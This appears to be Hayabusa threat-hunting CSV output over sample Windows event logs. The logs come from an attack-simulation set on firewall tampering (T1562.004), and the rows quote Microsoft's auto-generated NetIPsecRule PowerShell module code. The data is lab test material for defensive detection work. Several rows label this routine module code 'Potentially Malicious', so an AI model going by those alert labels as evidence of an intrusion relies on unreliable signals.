$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.775 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.775 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.775 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 